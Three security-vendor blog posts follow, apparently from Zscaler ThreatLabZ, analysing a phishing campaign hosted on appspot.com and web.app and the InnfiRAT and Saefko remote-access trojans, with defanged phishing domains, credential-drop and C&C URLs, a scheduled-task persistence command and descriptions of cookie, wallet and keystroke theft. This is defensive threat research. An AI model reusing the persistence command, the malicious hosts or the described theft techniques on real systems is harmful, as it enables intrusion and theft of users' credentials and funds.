In July, Zscaler ThreatLabZ posted a blog about a rise in the use of Microsoft Azure domains to host phishing attacks. Our researchers recently detected similar activity on the Google domains Appspot.com and Web.app. Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Web.app is a mobile platform used for building mobile apps hosted by Firebase, which is Google’s mobile app platform.
These campaigns use SSL certificates issued by Appspot.com and Web.app, and they have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server.
In the analysis that follows, we’ll describe the techniques these campaigns use to avoid detection and we’ll show the phishing domains and the locations where the user credentials are being sent.
As of this date, many of these subdomains on appspot.com and web.app are not being flagged by VirusTotal.
Fig 1: VirusTotal detections for the subdomains
Web.app hosted phishing pages
The following screenshots are phishing pages of some of the sites that have used an SSL certificate issued by Web.app.
Fig 2: Microsoft login phishing page
Fig 3: SSL certificate page of the hosted phishing URL
Appspot.com hosted phishing pages
Fig 4: Google Drive login phishing page
Fig 5: Outlook login phishing page
Fig 6: Dropbox login phishing page
Fig 7: DocuSign login phishing page
Fig 8: OneDrive login phishing page
Fig 9: OneDrive login phishing page
Fig 10: OneDrive login phishing page
Evasion techniques
This is a sophisticated phishing campaign as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages.
In addition, the attackers are using the latest tactics to evade detection from scan engines, with most of the code written in an external JavaScript file. This filename is 32 characters long and different for every site.
Below is the source code of the phishing pages; the highlighted part is the external JavaScript mentioned above.
Fig 11: Source code of phishing page
Fig 12: Source code of phishing page
In the above landing page source code of the phishing URL, there is less content, no brand name, and no catchy strings that are common in most phishing campaigns. This enables it to bypass many automatic analysis engines and extend its survival.
The following screenshots show the code and the location where the user credentials are being sent. This code is present in randomly named, externally added JavaScript files.
Fig 13: Location used by the attacker to collect user credentials
Fig 14: Location used by the attacker to collect user credentials
The following figure shows a sample packet capture for this data being sent to the attacker’s site.
Fig 15: Packet capture for the data that has been sent to the attacker’s site
Zscaler is actively blocking these phishing pages. The following screen capture shows Zscaler detection for one of these pages:
Fig 16: Zscaler successfully detects these domains
Phishing domains
As of the writing of this blog, we have collected the following phishing domains.
uy67dass[.]appspot[.]com
ja8fspxzosaa[.]appspot[.]com
gjf9pxzosa[.]appspot[.]com
egoew023pzas[.]appspot[.]com
vhkad03pas[.]appspot[.]com
kda8gazxa[.]appspot[.]com
adgkao93pz[.]appspot[.]com
l9rwpodsxcs[.]appspot[.]com
cvgfsaz[.]appspot[.]com
jga9spzas[.]appspot[.]com
jjad9gdpxzsa[.]appspot[.]com
vadgka932oa[.]appspot[.]com
ls9ixosdsasa[.]appspot[.]com
qwsa92oozxa[.]appspot[.]com
adlg402ooz[.]appspot[.]com
bnb932psiz[.]appspot[.]com
authofisaiz[.]web[.]app
Telecomm-uk[.]web[.]app
f45ghdsas[.]appspot[.]com
Derr9qepzxas[.]appspot[.]com
Vgdikad9oqww[.]appspot[.]com
dsa3aszxsa[.]appspot[.]com
weotwe0dpa[.]appspot[.]com
Wy6fxsa[.]appspot[.]com
Yu56sdzsa[.]appspot[.]com
Vbhg45as[.]appspot[.]com
Hds9pzoas[.]appspot[.]com
khs9dpas[.]appspot[.]com
u76dfsdasa[.]appspot[.]com
y56fds[.]appspot[.]com
vfhgj3sz[.]appspot[.]com
eyq246ddpoas[.]appspot[.]com
h45dsagga[.]appspot[.]com
sds43dza[.]appspot[.]com
yt76uyhxzz[.]appspot[.]com
jh54dfaz[.]appspot[.]com
ytyfazxz[.]appspot[.]com
Where information is sent
Below are the locations where the phishing page is sending credentials entered by the user.
https://osipz[.]c3y5-tools[.]com/1[.]newsvpost_ads_auto/loading[.]php
https://osipz[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://uiufz[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]bugcart[.]com/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]dtvd[.]biz/1[.]newsvpost_ads/loading[.]php
https://uy6x[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://h76fg[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://hjif[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
Categories: Security Posts
InnfiRAT: A new RAT aiming for your cryptocurrency and more
Recently, the Zscaler ThreatLabZ team came across a new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine. This blog provides an analysis of this new RAT, including the way it communicates, all the tasks it performs, and the information it steals.
Background
As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user's computer. Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data. In addition, this RAT has ScreenShot functionality so it can grab information from open windows. For example, if the user is reading email, the malware takes a screenshot. It also checks for other applications running on the system, such as an active antivirus program.
InnfiRAT sends the data it has collected to its command-and-control (C&C) server and requests further instructions. The C&C can also instruct the malware to download additional payloads onto the infected system.
Technical analysis
1) Before executing the main payload, the malware initially checks whether the file is executing from %AppData% directory or not with the name NvidiaDriver.exe. If not, then a web request is sent to “iplogger[.]com/1HEt47" (possibly to check network connectivity).
2) It records all the running processes in an array, then iterates through each process and checks whether any process is running with the name NvidiaDriver.exe. If so, the malware kills that process and waits for an exit. Figure 1: Checks execution location, terminates process with name NvidiaDriver
3) InnfiRAT copies itself as %AppData%/NvidiaDriver.exe and executes it from %AppData% before terminating the current process.
Figure 2: The malware makes a copy of itself in %AppData%
4) After confirming the path of file execution, it writes a Base64 encoded PE file in memory, which is later decoded in its actual format and is loaded after changing the entry point of the file. This is also a .NET executable and contains the actual functionality of the malware.
Figure 3: Embedded PE file in encoded form
Figure 4: Embedded PE file is decoded and executed
Analysis of embedded .NET executable
All the strings inside the file are encoded with a custom encoding scheme that utilizes the XOR operation. Figure 5: Strings decoding logic
As the execution of the malware starts, it checks for the presence of VM environment. It does so by checking the return value from the routine JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337. If the return value is equal to the first value, enum[0], defined in the enum shown below, then it continues the execution or else it terminates.
Figure 6: User-defined enum structure
After performing the VM checks, the malware obtains the country and HWID information of the machine it is running on. To obtain the country information, it calls the routine EjarVhXфf8752612307563884480() [FetchNetworkInfo] and fetches the Country key value from the returned data in JSON format. Similarly, to obtain the HWID, it calls the routine ubобмдGogBлzWKrgrыaZucвлC33208440168().
Anti-VM checks
Inside the JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337() [VMDetection] routine:
Note: All the enum values are referenced using enum[index] during analysis where the index starts from 0.
1. Performs WMIquery to obtain the following information:
"Manufacturer" "Caption" "Name" "ProcessorId" "NumberOfCores" "NumberOfLogicalProcessors" "L2CacheSize" "L3CacheSize" "SocketDesignation"
It then checks, one-by-one, if the manufacturer contains one of the below-mentioned strings and returns the value from the enum as specified:
“VBoxVBoxVBox” returns enum[2] “VMwareVMware” returns enum[1] “Prl hyperv returns enum[3] “Microsoft Corporation” returns enum[4]
2. WMIquery is performed again but this time to obtain the following information:
"DeviceID" "MediaType" "Model" "PNPDeviceID" "SerialNumber"
A check is performed if the PnpDeviceId contains one of the below strings and returns the value from the enum as specified:
“VBOX_HARDDISK” returns enum[2] “VEN_VMWARE” returns enum[1]
If none of the above conditions match, it returns enum[0].
Machine network information
Inside the EjarVhXфf8752612307563884480() [FetchNetworkInfo] routine:
A web request is sent to the following URL https://ipinfo[.]io/json and the received data is returned from the function. The received data contains the following information:
"ip" "city" "region" "country" "loc" "postal" "org"
Figure 7: Web request being made
Network communication
Inside the мMлFкCцеGPбiбqюK1559516831() [CreateDuplexChannel] routine:
InnfiRAT sets up a duplex channel with the name “IVictim” using DuplexChannelFactory tcp://62[.]210[.]142[.]219:17231/IVictim
Figure 8: Creating a duplex channel with C&C server
After forming the duplex channel with the name IVictim, it uses the IVictim interface, which contains the following methods:
“Subscribe” “CompleteTask” “GetDlls” “AvailableTasks”
Figure 9: Available methods in the IVictim interface
Inside the SуkdVkцiшkUояUuчPуюяmмuty187968776() [SubscribeVictim] routine:
InnfiRAT calls the subscriber method from the IVictim interface with login = “innfiniti”
Figure 10: The subscribe method from the IVictim interface is invoked
Inside the хaxeYхсиghIжNпDмвQюwkуpкgимuбсфbnдбMвMC67210633684721828() [GetAndExecuteSpecifiedTask] routine:
InnfiRAT obtains the tasks inside a UserTask list by invoking AvailableTasks where UserTask has the following keys:
“ID” “Action” “URL” “FinalPoint” “Current” “Status” “Country” “RunSilent” “Argument”
It iterates through each task. On each iteration, it first checks for the country value received to be equal to “ALL” OR the one present in the BasicInfoVictim class, which was obtained earlier AND the action to perform is "DownAndEx" and the URL value is available. If the above conditions match, then the CompleteTasks method is called with three arguments:
“login” “hwid” “TaskID”
The RAT calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the file. Arg1 = Path of the file to be executed [obtained from the URL] Arg2 = Arguments to the file to be executed [obtained from Argument key of current UserTask element] Arg3 = true/false [Obtained from RunSilent key of current UserTask element]
After iterating all items in the UserTask list, it sleeps for 30,000 milliseconds.
Figure 11: Country, action, and URL checks are performed and the specified task is completed
Process checks
Inside the LlсiсkнwychhVзjзNзxрFrUOE4656655235232302206601527615541285() [ProcessCheck] routine:
All the running processes in the system are obtained, their names are converted to lowercase and then a check is performed to see if the name matches with any of the following strings:
“taskmgr” “processhacker” “procmon” “procexp” “pchunter” “procexp64”
If there are any matches, the process terminates. Below are the snapshots depicting the actions performed.
Figure 12: Obtaining processes, converting their names to lowercase, checking specific processes
Figure 13: Converting ProcessName to lowercase
Figure 14: Checking for above-mentioned running processes (process names are obfuscated here)
Inside wYxйыrоyTHuLдTч212065() [KillProcesses] routine:
InnfiRAT obtains the list of all processes running in the system and kills any process whose name contains one of the following strings: “chrome” “browser” “firefox” “opera” “amigo” “kometa” “torch” “orbitum”
Figure 15: Kills processes that contain any of the above-mentioned strings
Scheduled execution
Inside the эйviMhйсuьZCпJфшcкLйшuв348374() [ScheduleMalwareExecution] routine:
The CMD (cmd.exe) command string is constructed and executed to schedule the malware execution. The command string looks like below:
/C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " /st HH:mm /du 9999:59 /sc daily /ri 1 /f
Figure 16: CMD command is constructed and executed
C&C commands
Here are some tasks performed by the malware based on the commands received from C&C server:
1. SendUrlAndExecute(string URL)
InnfiRAT downloads the file from the specified URL by calling the routine жRfаeQbrwйfsLGыhчUrEжьFхaяGчрлCдtGжSofьQvдnIмs8383484343838630833542717281211() [DownloadFileFromUrl]. Inside this routine, a directory is first created with the name TEMP inside the %AppData% if it doesn’t exist. Then the file is downloaded and saved inside this folder with the name extracted from the passed URL. The URL passed is broken into parts via delimiter ‘/’ and the last item is used as the file name.
Figure 17: Create folder and download file
Once the download is complete, it calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the downloaded file. Arg1 = Path of the file to be executed Arg2 = Arguments to the file to be executed Arg3 = true
Figure 18: Execute the downloaded file
2. ProfileInfo()
Inside the routine, it collects the following information:
“NetworkInfo”:{ "ip" "city" "region" "country" "loc" "postal" "org" } “PCAdmin” “PCInformation” :{ “FrameWorkDescription” “Processors” “PRocessorsCore” “VideoCards” }
It then sends the information to the C&C server. Figure 19: UserProfile info being collected and sent to the C&C server
3. LoadLogs()
It calls the GetDlls() routine, which obtains information inside a list of type DownloadDll where DownloadDll has two keys:
“Path”, represents a relative path to an .exe file “ByteArray” binary data
Figure 20: GetDlls being called
After fetching the list, InnfiRAT traverses each element inside the list via a for-loop. Inside the for-loop:
The value of the Path key is split using delimiter “\\”. The second value in the split is the name of the directory. A check is performed to see if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created.
A check is performed if no file exists specified by Path key in the executing module directory. If the check is true, it creates the file and writes the value of ByteArray to this created file.
The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called.
Finally, data obtained from UserProfile() is sent to the C&C server.
Figure 21: A directory is created, file is created, and KillProcesses is called; response is sent to the C&C server
4. LoadCookies() - Steal Browser Cookie information
InnfiRAT calls the GetDlls() routine, which obtains information inside a list of type DownloadDll where DownloadDll has two keys:
“Path” represents a relative path to an .exe file “ByteArray” binary data
Figure 22: GetDlls being called
After fetching the list, the malware traverses each element inside the list via for-loop. The following occurs inside the for-loop:
The value of the Path key is split using the delimiter “\\”. Second, the value in the split is the name of the directory. A check is performed if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created.
A check is performed if no file exists specified by the Path key in the executing module directory. If a check is true, it creates the file and writes the value of ByteArray to this created file.
Figure 23: Directory is created, file is created
It creates an empty list of BrowserCook type where BrowserCook has two keys, namely: “CookiePaths” “BrowserName”
The name and corresponding cookie path are retrieved for the following browsers one by one:
“Chrome” “Yandex” “Kometa” “Amigo” “Torch” “Orbitum” “Opera” “Mozilla”
A BrowserCook type element is created with the fetched information and is added to the list created earlier.
Figure 24: Browser info is retrieved and added to the list
It creates an empty list of BrowserCookie type where BrowserCookie has three keys, namely: “Browser” “FileName” “FileArray”
Inside, two for-loop elements of the BrowserCookie type are created, where the Browser key and FileArray key are both assigned values using the information from the previously created BrowserCook list and the FileName is set to _Cookie.txt if the browser name for the current element is not “Mozilla”, or else it is set to Cookie.txt.
Figure 25: BrowserCookie elements list is built
The harvested BrowserCookie list is then sent to the C&C server and the temporary file and directory are deleted.
Figure 26: File and directory is deleted
5. LoadWallets() - Steal Bitcoin Wallets
The malware creates an empty list of the BitcoinWallet type where BitcoinWallet has two keys, namely: “WalletArray” “WalletName”
A check is performed to see if a file for a Litecoin or Bitcoin wallet is present in the system at the following location:
Litecoin: %AppData%\Litecoin\wallet.dat Bitcoin: %AppData%\Bitcoin\wallet.dat
If it is found, then the element of type BitcoinWallet is added to the list after assigning a name to the WalletName key and reading the corresponding wallet file in the WalletArray key.
Figure 27: File presence is checked, BitcoinWallet element is added to the list
Finally, the created list is sent in response to the C&C server.
Figure 28: List is sent in response to the C&C server
6. LoadFiles() - Steal small text files potentially containing sensitive information
InnfiRAT collects all the .txt files available on the desktop whose size is less than 2,097,152 bytes inside a list of CustomFile types. CustomFile has two keys namely: “Name” “FileArray”
The created list is sent in response to the C&C server.
Figure 29: Files are collected and sent to the C&C server
Figure 30: Inside HcапkцтеuxчI46156665847187238336657104255061.лQtdjюAKMCdскHUжfъqZTzmMнуз68532317728035381607276587242500 [CollectFiles]
7. LoadProcesses() - Get the list of running processes on the victim machine
InnfiRAT creates an empty list of type ProcessInfo where ProcessInfo has three keys, namely: “ID” “Name” “Path”
It obtains the list of all the processes running in the system and sends the list in response to the C&C server.
Figure 31: Process information is obtained and the list is sent to the C&C server
8. Kill(int process) - Command to Kill a specific process on the victim machine
InnfiRAT obtains the list of all the processes running in the system and then inside a for-loop, the processID of obtained processes is compared with the processID passed as an argument to this routine one at a time. If there is a match, the process is killed and the flag variable is set to true.
Finally, a response is sent to C&C server.
Figure 32: Process is killed and response is sent
9. Screenshot() - Take a screenshot on the victim machine
It calls the qюFpьGoJv97921676245() [CaptureScreenshot] routine and the returned value is sent to the C&C server.
Figure 33: Screenshot captured and sent to the C&C server
Figure 34: Inside the qюFpьGoJv97921676245() [CaptureScreenshot] routine
10. RunCommand(string command) - Execute specified command on the victim machine
This creates a new CMD process, builds the command line argument using the command passed as an argument to this routine, and finally starts the process.
Command line argument: /c + “ ” + command
Figure 35: Received command is executed
11. ClearCooks() - Clears browser Cookies on the victim machine for specific Browsers
InnfiRAT creates an empty list of BrowserCook type where BrowserCook has two keys, namely: “CookiePaths” “BrowserName”
The name and corresponding cookie path are retrieved for the following browsers one by one:
“Chrome” “Yandex” “Kometa” “Amigo” “Torch” “Orbitum” “Opera” “Mozilla”
A BrowserCook type element is created with the fetched information and is added to the list created earlier. Figure 36: Browser info is retrieved and added to the list
The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called.
The BrowserCook type list created earlier is traversed and cookies files are deleted using CookiePaths key value.
Finally, a response is sent to the C&C server.
Figure 37: The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called, cookie files are deleted, and response is sent to the C&C server
Conclusion
A RAT, remote-access trojan, is a type of malware that includes a backdoor, giving intruders the ability to control the targeted computer remotely and enabling them to perform any number of tasks, such as logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. They can also be designed to spread to other systems on a network.
Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren't from a trusted source.
The ThreatLabZ team continues to monitor this threat and ensure that Zscaler customers are protected.
IOCs
Md5: f992dd6dbe1e065dff73a20e3d7b1eef
Downloading URL: rgho[.]st/download/6yghkhzgm/84986b88fe9d7e3caf5183e4342e713adf6c3040/df3049723db33889ac49202cb3a2f21ac1b82d5b/peugeot.zip
NetworkURL: tcp://62[.]210[.]142[.]219:17231/IVictim
Categories: Security Posts
Saefko: A new multi-layered RAT
Recently, the Zscaler ThreatLabZ team came across a new remote-access trojan (RAT) for sale on the dark web. The RAT, called Saefko, is written in .NET and has multiple functionalities. This blog provides a detailed analysis of this piece of malware, including its HTTP, IRC, and data stealing and spreading module.
Background
A RAT is a type of malware that includes a backdoor for remote administrative control of the targeted computer. RATs are usually downloaded as a result of a user opening an email attachment or downloading an application or a game that has been infected. Because a RAT enables administrative control, the intruder can do just about anything on the targeted computer, such as monitoring user behavior by logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more.
Upon successful infection, the Saefko RAT stays in the background and executes every time the user logs in. It fetches the chrome browser history looking for specific types of activities, such as those involving credit cards, business, social media, gaming, cryptocurrency, shopping, and more. It sends the data it has collected to its command-and-control (C&C) server and requests for further instructions. The C&C instructs the malware to provide system information and the RAT will begin to collect a range of data including screenshot,videos, keystroke logs and more. The C&C can also instruct the malware to download additional payload onto the infected system.
RATs present a unique business threat. They have the ability to steal a lot of data without being detected and spread to other systems across the network. The ThreatLabZ team also detonated the Saefko RAT in the Zscaler Cloud Sandbox to determine its functionality, communications, and the potential threat.
Technical Analysis of the Saefko RAT
Saefko malware unpacks itself and places the saefkoagent.exe file in “/%AppData%/Roaming/SaefkoAgent.exe” and executes it. It also copies itself to “/%AppData%/Roaming/windows.exe” and "/%AppData%/Local/explorer.exe” and executes them.
Autostart Key
The Saefko malware creates a startup key to execute the malware at every login. If it is executing from an admin account, it creates the following registry key: “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Otherwise, it creates a registry key in the following path: “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer”
Functionality
Saefko first checks to see whether the internet connection is active by connecting to “clients3.google.com/generate_204”. It then uses a unique technique to identify if the infected system contains any vital information. It fetches the browser history and searches for particular websites that have been visited by the user and makes a count based on the categories mentioned below. From the counts, the attacker can determine which systems it should target first from all the infected systems.
The list of different categories it searches include:
Credit card possibility
paypal.com
2c2p
adyen.com
volusion.com
pay.amazon.com
apple.com/apple-pay/
atos.net
authorize.net
BIPS
bitpay.com
bpay.com
braintreepayments.com
centup.org
cm.com
creditcall.com
cybersource.com
mastercard.com
digi.cash
digitalriver.com
dwolla.com
elavon.com
euronetworldwide.com
eway.io
firstdata.com
fortumo.com
pay.google.com/send/home
heartlandpaymentsystems.com
ingenico.com
ippayments.com
klarna.com
emergentpayments.ne
moduslink.com
mpay.com
neteller.com
ofx.com
pagseguro
payoneer.com
paymentwall.com
paypoint.co
paysbuy.com
paysafe.com
paytm.com
payzone.co.uk
crunchbase.com
qiwi.com
globalpaymentsinc.com
reddotpayment.com
sagellc.com
skrill.com
stripe.com
squareup.com
tencent.com
transfermate.com
transferwise.com
wmtransfer.com
trustly.com
wepay.com
verifone.com
xendpay.com
pay.weixin.qq.com
money.yandex.ru
wirecard.com
truemoney.com
xsolla.com
myshopify.com/admin
payza.com
2checkout.com
3dcart.com
paysafecard.com
weebly.com
Gaming activity value
origin.com
steampowered.com
g2a.com
twitch.tv
nichegamer.com
techraptor.net
gematsu.com
estructoid.com
pcgamer.com
gamefaqs.gamespot.com
gamespot.com
siliconera.com
rockpapershotgun.com
gameinformer.com
decluttr.com
glyde.com
gamestop.com
microsoft.com/account/xboxlive
playstation.com/en-us/network/store
nintendo.com/games
gog.com
game.co.uk
itch.io
gamefly.com
greenmangaming.com
gaming.youtube.com
Cryptocurrency value
etoro.com
24option.com
puatrack.com/coinbull2/
luno.com
paxforex.com
binance.com
coinbase.com
cex.io
changelly.com
coinmama.com
xtrade.ae
capital.com
paxful.com
kraken.com
poloniex.com
gemini.com
bithumb.com
xcoins.io
cobinhood.com
coincheck.com
coinexchange.io
shapeshift.io
bitso.com
indacoin.com
cityindex.co.uk
bitbay.net
bitstamp.net
cryptopia.co.nz
pro.coinbase.com
kucoin.com
bitpanda.com
foxbit.com.br
bitflyer.com
bitfinex.com
bit-z.com
quadrigacx.com
quadrigacx.com
big.one
lakebtc.com
wex.nz
kuna.io
yobit.io
zebpay.com
hitbtc.com
bx.in.th
trezor.io
electrum.org
blockchain.com
crypto.robinhood.com
exodus.io
mycelium.com
bitcointalk.org
btc-e.com
moonbit.co.in
bitcoinaliens.com
bitcoinwisdom.com
coindesk.com
cointelegraph.com
ccn.com
reddit.com/r/Bitcoin/
bitcoin.org/en/blog
newsbtc.com
blog.spectrocoin.com
blog.coinbase.com
bitcoinist.com
forklog.com
abitcoinc.com
bitcoin.stackexchange.com
news.bitcoin.com
blog.bitfinex.com
blog.genesis-mining.com
Instagram activity
instagram.com
m.instagram.com
Facebook activity
facebook.com
m.facebook.com
Youtube activity
youtube.com
m.youtube.com
Google+ activity
plus.google.com
m.plus.google.com
Gmail activity
gmail.com
mail.google.com
Shopping activity
boohoo.com
gymshark.com
mail.google.com
prettylittlething.com
showpo.com
athleta.com
ae.com
ruelala.com
asos.com
superdry.com
zaful.com
zafulswimwear.com
luckybrand.com
forever21.com
urbanoutfitters.com
nastygal.com
jcrew.com
anthropologie.com
allsaints.com
uniqlo.com
armaniexchange.com
fashionnova.com
saksoff5th.com
target.com
macys.com
barneys.com
zappos.com
sneakersnstuff.com
yoox.com
nike.com
simmi.com
amazon.com
ebay.com
walmart.com
newegg.com
bestbuy.com
ftd.com
1800flowers.com
glossier.com
sephora.com
thebodyshop.com
ulta.com
horchow.com
homedepot.com
pier1.com
bedbathandbeyond.com
wayfair.com
shoptiques.com
viator.com
etsy.com
cloud9living.com
seatgeek.com
aliexpress.com
alibaba.com
Business value
linkedin.com
twitter.com
nasdaq.com
ft.com
reuters.com
nyse.com
tsx.com
marketwatch.com
thestreet.com
wsj.com
investing.com
investopedia.com
finance.yahoo.com
seekingalpha.com
fool.com
investorguide.com
zacks.com
home.saxo
forexbrokers.com
swissquote.com
cmcmarkets.com
fxpro.co.uk
forex.com
dukascopy.com
interactivebrokers.com
tdameritrade.com
bankofinternet.com
ally.com
bankpurely.com
redneck.bank
Saefko also collects additional user application data, including:
Command
Description
irc_channel
IRC channel name
irc_nickname
Nickname
irc_password
IRC channel Password
irc_port
IRC Port for communication to a server
irc_server
Server name
machine_active_time
System uptime
machine_artct
Machine Architecture
machine_bitcoin_value
Number of cryptocurrency sites visited by the user
machine_business_value
Number of business sites visited by the user
machine_calls_activity
0
machine_camera_activity
No. of “.png” files present on the desktop
machine_country_iso_code
Country code fetch from “ipinfo.io/geo”
machine_lat
latitude
machine_lng
longitude
machine_creadit_card_posiblty
Checks the number of payment sites visited by the user
machine_current_time
Taking machine current time
machine_facebook_activity
Checks the number of times the user visited facebook
machine_gaming_value
Checks the number of times the user visited gaming websites
machine_gmail_avtivity
Checks the number of times the user visited gmail
machine_googleplus_activity
Checks the number of times the user visited google+
machine_instgram_activty
Checks the number of times the user visited Instagram
machine_ip
Machine IP
machine_lat
The geographic location of the system (latitude)
machine_lng
The geographic location of the system (longitude)
machine_os_type
1
machine_screenshot
Captures screenshot and encode it in base 64
machine_shooping_activity
Checks number of times shopping sites visit by the user
The RAT sends the collected data to a command and control server as shown below:
After getting an "ok" response from the server, Saefko begins the "StartServices" function, which has four different infection modules:
HTTPClinet
IRCHelper
KEYLogger
StartLocalServices (USB spreading)
HTTP Clinet
(Possible misspelling of HTTP Client by the author)
The RAT sends a request to the server, requesting for a new task. It sends a command “UpdateAndGetTask” and also sends other information, including machine_ID, machine_os, and privateip, as shown below:
The task is the URL from which the malware downloaded the new payload and executed it on the infected machine.
Key Logger
The malware uses the SetWindowsHookEx API for capturing keystrokes. It stores the captured keystrokes into a “log.txt” file. The filepath is: “\%AppData%\Local\log.txt.”
IRC Helper
First, the malware disconnects the current IRC connection. Then, it sends status information to the C&C as shown below:
pass: password
command: UpdateHTTPIRCStatus
machine_id: unique id sent by C&C in an earlier request
irc_status: 1
Next malware fetch
Serverlist: it selects a server from the list below.
Port: port
Nickname: generates a random 7 character name
List of IRC servers and ports
IRC server
Port
IRC server
Port
irc.afterx.net
6667
irc.cyanide-x.net
6667
chat.freenode.net
6667
irc.europnet.org
6667
irc.azzurra.org
6669
irc.rizon.net
6669
irc.dal.net
6667
irc.efnet.org
6667
irc.gamesurge.net
6667
open.ircnet.net
6669
irc.quakenet.org
6667
irc.swiftirc.net
6667
eu.undernet.org
6667
irc.webchat.org
7000
irc.2600.net
6667
irc.abjects.net
6669
irc.accessirc.net
6667
irc.afternet.org
6667
irc.data.lt
6667
irc.allnetwork.org
6667
irc.alphachat.net
6667
irc.austnet.org
6667
irc.axenet.org
6667
irc.ayochat.or.id
6667
irc.beyondirc.net
6669
irc.blitzed.org
6667
irc.bongster.org
6669
irc.caelestia.net
6667
irc.canternet.org
6667
irc.chatall.org
6669
irc.chatcafe.net
6667
irc.chatspike.net
6667
irc.chatzona.org
6667
irc.criten.net
6667
irc.cyberarmy.net
6667
irc.d-t-net.de
6667
irc.darkmyst.org
6667
irc.deepspace.org
6667
irc.dream-irc.de
6667
irc.drlnet.com
6667
irc.dynastynet.net
6667
irc.echo.com
6667
irc.ecnet.org
6667
irc.enterthegame.com
6667
irc.epiknet.org
6667
irc.esper.net
6667
irc.euirc.net
6669
irc.evolu.net
6667
irc.explosionirc.net
6667
irc.fdfnet.net
6668
irc.fef.net
6667
Saefko connects to one of these servers and waits for a response. In the response, it checks for “T_T” string and any separate messages using that string. Below is the list of IRC functions that the RAT can perform. According to the command it receives, Saefko will respond with corresponding data.
List of IRC Commands
IRC Command
Description
dexe
Download a file from a given URL and execute it
hdexe
Download a file from a given URL and execute it (UseShellExecute=false)
vistpage
Open URL
hvistpage
Open URL (UseShellExecute = false)
snapshot
Captures video frame, converts into Base64 and sends to C&C (Detailed information explained below); also replies “.oksnapshot”
shell
Executes command using cmd.exe
tcp
Makes a tcp connection using a given IP and port.
identify
Send system information:
OS type: Microsoft windows
OS version: OS version
OS Username: username
OS MachineName: System name
OS SystemDirectory: System Directory
opencd
Open CDROM drive. Command: set CDAudio door open
closecd
Close CDROM drive. Command: set CDAudio door closed
screenshot
Capture screenshot, encode it into Base64 and send to C&C
ping
Reply “okping”
camlist
Gets the video devices from the system and sends information to the C&C.Detailed information explained below.
pwd
Current directory
location
Gets the system location using “https://ipinfo.io/geo”
IP, city, region, country, latitude and longitude
keylogs
Encode the keylog file (log.txt) using base64 and send it to C&C
uninstall
Delete the autostart registry key (RUN) and terminate itself.
Camlist
Saefko also searches for the following payloads in the system:
AForge.dll
AForge.Video.DirectShow.dll
AForge.Video.dll
Sqlite3.dll
If these files are not present, the malware sends a request to the C&C to download these files. Next, it searches for a list of video input devices on the targeted system and sends the related information to the C&C.
Snapshot
Saefko also captures videos from the device present on the system, encodes the video frame with Base64 and sends it to the C&C.
Start USB Service
Saefko checks to see if the drive type is either removable or networked, after which it starts the infection and copies the files below onto a removable drive.
Sas.exe
USBStart.exe
usbspread.vbs
Sas.exe is a copy of the malware itself. USBStart.exe is fetched from the resource section of the main binary. It contains code to execute Sas.exe. It creates a usbspread.vbs file then executes it. It searches every directory and all the files and creates a "lnk" file for each file and directory with a target path USBStart.exe file. When the removable device is plugged in any other system, the user is tricked into clicking a lnk file as the main files and folder are hidden. Lnk file executes the USBStart.exe that ends up executing Sas.exe which is the main payload. So it futher infect other Systems.
Below is the code of the usbspread.vbs file:
One online forum has an ad for a cracked Saefko RAT tool as shown below. It is a multi-protocol, multi-operating system remote administration tool that can be used to launch the malware on Windows and Android devices.
Conclusion
To protect systems from RATs, users must refrain from downloading programs or opening attachments that aren't from a trusted source. At the administrative level, it's always a good idea to block unused ports, turn off unused services, and monitor outgoing traffic. Attackers are often careful to prevent the malware from doing too much activity at once, which would slow down the system and possibly attract the attention of the user and IT.
Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.
IOCs
Md5: D9B0ECCCA3AF50E9309489848EB59924 C4825334DA8AA7EA9E81B6CE18F9C15F 952572F16A955745A50AAF703C30437C 4F2607FAEC3CB30DC8C476C7029F9046 7CCCB06681E7D62B2315761DBE3C81F9 5B516EAB606DC3CC35B0494643129058
Downloader URL: industry.aeconex[.]com/receipt-inv.zip 3.121.182[.]157/dwd/explorer.exe 3.121.182[.]157/dwd/vmp.exe deqwrqwer.kl[.]com.ua/ex/explorer.exe maprivate[.]date/dhl-miss%20craciun%20ana%20maria%20#bw20feb19.zip
